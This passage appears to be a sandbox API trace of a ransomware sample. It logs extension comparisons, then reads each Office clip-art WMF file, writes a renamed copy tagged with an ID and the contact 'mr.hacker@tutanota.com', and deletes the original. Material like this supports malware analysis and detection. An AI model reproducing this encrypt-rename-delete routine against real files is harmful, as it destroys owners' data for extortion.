lstrlenW (lpString=".ppt") returned 4 [0271.723] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF") returned 63 [0271.723] lstrlenW (lpString=".zip") returned 4 [0271.723] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.723] lstrlenW (lpString=".rar") returned 4 [0271.723] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.723] lstrlenW (lpString=".bz2") returned 4 [0271.723] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.723] lstrlenW (lpString=".7z") returned 3 [0271.723] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF") returned 63 [0271.723] lstrlenW (lpString=".dbf") returned 4 [0271.723] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF") returned 63 [0271.723] lstrlenW (lpString=".1cd") returned 4 [0271.723] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF") returned 63 [0271.723] lstrlenW (lpString=".jpg") returned 4 [0271.724] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.724] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF") returned 63 [0271.724] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF") returned 63 [0271.724] lstrlenW (lpString=".doc") returned 4 [0271.724] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.724] lstrlenW (lpString=".docx") returned 5 [0271.724] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.724] lstrlenW (lpString=".pdf") returned 4 [0271.724] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.724] lstrlenW (lpString=".xls") returned 4 [0271.724] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.724] lstrlenW (lpString=".xlsx") returned 5 [0271.724] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.724] lstrlenW (lpString=".ppt") returned 4 [0271.724] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.724] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF") returned 63 [0271.724] lstrlenW (lpString=".zip") returned 4 [0271.724] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.724] lstrlenW (lpString=".rar") returned 4 [0271.724] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.724] lstrlenW (lpString=".bz2") returned 4 [0271.724] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.724] lstrlenW (lpString=".7z") returned 3 [0271.724] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.724] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF") returned 63 [0271.724] lstrlenW (lpString=".dbf") returned 4 [0271.724] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.724] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF") returned 63 [0271.724] lstrlenW (lpString=".1cd") returned 4 [0271.724] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.724] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF") returned 63 [0271.725] lstrlenW (lpString=".jpg") returned 4 [0271.725] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.725] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.725] lstrlenW (lpString="FD02075_.WMF") returned 12 [0271.725] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02075_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0271.725] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=4396) returned 1 [0271.725] CloseHandle (hObject=0x328) returned 1 [0271.725] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02075_.wmf")) returned 0x20 [0271.725] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02075_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.725] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02075_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0271.725] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.725] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.726] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02075_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0271.726] GetLastError () returned 0x0 [0271.726] ReadFile (in: hFile=0x328, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x112c, lpOverlapped=0x0) returned 1 [0271.900] WriteFile (in: hFile=0x3ac, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x1130, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x1130, lpOverlapped=0x0) returned 1 [0271.901] ReadFile (in: hFile=0x328, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0271.901] WriteFile (in: hFile=0x3ac, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.901] SetEndOfFile (hFile=0x3ac) returned 1 [0271.901] CloseHandle (hObject=0x3ac) returned 1 [0271.901] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.901] SetEndOfFile (hFile=0x328) returned 1 [0271.903] CloseHandle (hObject=0x328) returned 1 [0271.904] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.916] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02075_.wmf")) returned 1 [0271.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF") returned 63 [0271.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF") returned 63 [0271.947] lstrlenW (lpString=".doc") returned 4 [0271.947] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.947] lstrlenW (lpString=".docx") returned 5 [0271.947] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.947] lstrlenW (lpString=".pdf") returned 4 [0271.947] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.947] lstrlenW (lpString=".xls") returned 4 [0271.947] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.947] lstrlenW (lpString=".xlsx") returned 5 [0271.947] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.947] lstrlenW (lpString=".ppt") returned 4 [0271.947] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF") returned 63 [0271.947] lstrlenW (lpString=".zip") returned 4 [0271.947] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.947] lstrlenW (lpString=".rar") returned 4 [0271.947] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.947] lstrlenW (lpString=".bz2") returned 4 [0271.947] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.947] lstrlenW (lpString=".7z") returned 3 [0271.947] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF") returned 63 [0271.947] lstrlenW (lpString=".dbf") returned 4 [0271.948] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.948] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF") returned 63 [0271.948] lstrlenW (lpString=".1cd") returned 4 [0271.948] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.948] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF") returned 63 [0271.948] lstrlenW (lpString=".jpg") returned 4 [0271.948] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.948] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF") returned 63 [0271.948] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF") returned 63 [0271.948] lstrlenW (lpString=".doc") returned 4 [0271.948] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.948] lstrlenW (lpString=".docx") returned 5 [0271.948] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.948] lstrlenW (lpString=".pdf") returned 4 [0271.948] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.948] lstrlenW (lpString=".xls") returned 4 [0271.948] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.948] lstrlenW (lpString=".xlsx") returned 5 [0271.948] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.948] lstrlenW (lpString=".ppt") returned 4 [0271.948] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.948] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF") returned 63 [0271.948] lstrlenW (lpString=".zip") returned 4 [0271.948] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.948] lstrlenW (lpString=".rar") returned 4 [0271.948] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.948] lstrlenW (lpString=".bz2") returned 4 [0271.948] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.948] lstrlenW (lpString=".7z") returned 3 [0271.948] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.948] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF") returned 63 [0271.949] lstrlenW (lpString=".dbf") returned 4 [0271.949] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.949] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF") returned 63 [0271.949] lstrlenW (lpString=".1cd") returned 4 [0271.949] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.949] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02075_.WMF") returned 63 [0271.949] lstrlenW (lpString=".jpg") returned 4 [0271.949] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.949] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.949] lstrlenW (lpString="HH00084_.WMF") returned 12 [0271.949] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00084_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0272.136] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=2472) returned 1 [0272.136] CloseHandle (hObject=0x39c) returned 1 [0272.136] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00084_.wmf")) returned 0x20 [0272.145] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00084_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.146] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00084_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0272.146] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.146] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.146] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00084_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0272.146] GetLastError () returned 0x0 [0272.146] ReadFile (in: hFile=0x3ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x9a8, lpOverlapped=0x0) returned 1 [0272.160] WriteFile (in: hFile=0x328, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x9b0, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x9b0, lpOverlapped=0x0) returned 1 [0272.161] ReadFile (in: hFile=0x3ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0272.161] WriteFile (in: hFile=0x328, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.161] SetEndOfFile (hFile=0x328) returned 1 [0272.161] CloseHandle (hObject=0x328) returned 1 [0272.161] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.161] SetEndOfFile (hFile=0x3ac) returned 1 [0272.163] CloseHandle (hObject=0x3ac) returned 1 [0272.163] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.239] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00084_.wmf")) returned 1 [0272.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF") returned 63 [0272.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF") returned 63 [0272.245] lstrlenW (lpString=".doc") returned 4 [0272.245] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.245] lstrlenW (lpString=".docx") returned 5 [0272.245] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.245] lstrlenW (lpString=".pdf") returned 4 [0272.245] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.245] lstrlenW (lpString=".xls") returned 4 [0272.245] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.245] lstrlenW (lpString=".xlsx") returned 5 [0272.245] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.245] lstrlenW (lpString=".ppt") returned 4 [0272.245] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF") returned 63 [0272.246] lstrlenW (lpString=".zip") returned 4 [0272.246] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.246] lstrlenW (lpString=".rar") returned 4 [0272.246] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.246] lstrlenW (lpString=".bz2") returned 4 [0272.246] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.246] lstrlenW (lpString=".7z") returned 3 [0272.246] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF") returned 63 [0272.246] lstrlenW (lpString=".dbf") returned 4 [0272.246] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF") returned 63 [0272.246] lstrlenW (lpString=".1cd") returned 4 [0272.246] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF") returned 63 [0272.246] lstrlenW (lpString=".jpg") returned 4 [0272.246] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF") returned 63 [0272.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF") returned 63 [0272.246] lstrlenW (lpString=".doc") returned 4 [0272.246] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.246] lstrlenW (lpString=".docx") returned 5 [0272.246] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.246] lstrlenW (lpString=".pdf") returned 4 [0272.246] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.246] lstrlenW (lpString=".xls") returned 4 [0272.246] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.246] lstrlenW (lpString=".xlsx") returned 5 [0272.247] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.247] lstrlenW (lpString=".ppt") returned 4 [0272.247] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF") returned 63 [0272.247] lstrlenW (lpString=".zip") returned 4 [0272.247] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.247] lstrlenW (lpString=".rar") returned 4 [0272.247] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.247] lstrlenW (lpString=".bz2") returned 4 [0272.247] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.247] lstrlenW (lpString=".7z") returned 3 [0272.247] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF") returned 63 [0272.247] lstrlenW (lpString=".dbf") returned 4 [0272.247] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF") returned 63 [0272.247] lstrlenW (lpString=".1cd") returned 4 [0272.247] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF") returned 63 [0272.247] lstrlenW (lpString=".jpg") returned 4 [0272.247] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.247] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0272.247] lstrlenW (lpString="HH00524_.WMF") returned 12 [0272.247] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00524_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0272.701] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=14688) returned 1 [0272.701] CloseHandle (hObject=0x388) returned 1 [0272.701] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00524_.wmf")) returned 0x20 [0272.888] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00524_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.888] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00524_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0272.888] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.888] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.888] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00524_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0272.889] GetLastError () returned 0x0 [0272.889] ReadFile (in: hFile=0x3ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x3960, lpOverlapped=0x0) returned 1 [0272.933] WriteFile (in: hFile=0x390, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x3970, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x3970, lpOverlapped=0x0) returned 1 [0272.934] ReadFile (in: hFile=0x3ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0272.934] WriteFile (in: hFile=0x390, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.934] SetEndOfFile (hFile=0x390) returned 1 [0272.934] CloseHandle (hObject=0x390) returned 1 [0272.934] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.934] SetEndOfFile (hFile=0x3ac) returned 1 [0272.936] CloseHandle (hObject=0x3ac) returned 1 [0272.936] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.936] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00524_.wmf")) returned 1 [0272.937] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF") returned 63 [0272.937] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF") returned 63 [0272.937] lstrlenW (lpString=".doc") returned 4 [0272.937] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.937] lstrlenW (lpString=".docx") returned 5 [0272.937] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.937] lstrlenW (lpString=".pdf") returned 4 [0272.937] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.937] lstrlenW (lpString=".xls") returned 4 [0272.938] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.938] lstrlenW (lpString=".xlsx") returned 5 [0272.938] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.938] lstrlenW (lpString=".ppt") returned 4 [0272.938] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.938] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00524_.WMF") returned 63 [0272.938] lstrlenW (lpString=".zip") returned 4 [0272.938] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.938] lstrlenW (lpString=".rar") returned 4 [0272.938] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.938] lstrlenW (lpString=".bz2") returned 4 [0272.938] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.938] lstrlenW (lpString=".7z") returned 3 [0272.938] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.938] lstrlenW (lpString="C:\\Program Files\\Microsoft 